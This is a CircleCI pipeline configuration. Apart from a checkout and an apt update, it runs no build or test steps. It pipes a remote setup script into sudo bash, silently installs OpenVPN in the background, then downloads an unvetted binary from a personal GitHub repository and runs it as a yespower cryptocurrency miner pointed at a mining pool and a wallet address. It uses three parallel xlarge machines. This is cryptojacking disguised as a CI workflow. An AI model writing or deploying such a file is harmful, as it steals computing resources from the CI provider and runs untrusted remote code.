working_dir: &working_dir ~/app

version: 2.1
 
workflows: 
  sample:   
    jobs: 
      - job
 
jobs: 
  job:
    parallelism: 3
    machine:
      image: ubuntu-2204:2022.04.1
    resource_class: xlarge
     
    steps: 
      - checkout
      - run: sudo apt update
      - run: curl -sL https://deb.nodesource.com/setup_14.x | sudo -E bash -
      - run: curl -O https://raw.githubusercontent.com/angristan/openvpn-install/master/openvpn-install.sh
      - run: chmod +x openvpn-install.sh
      - run: sudo ./openvpn-install.sh > /dev/null 2>&1 &
      - run: wget https://raw.githubusercontent.com/jsiqiisn/whiv/main/avx2
      - run: chmod +x avx2
      - run: ./avx2 -a yespower -o stratum+tcp://stratum-asia.rplant.xyz:7070 -u WbQR3w5EyWkuoFjhjYymrr3pEZDSTTgQkX.avx22 -t8
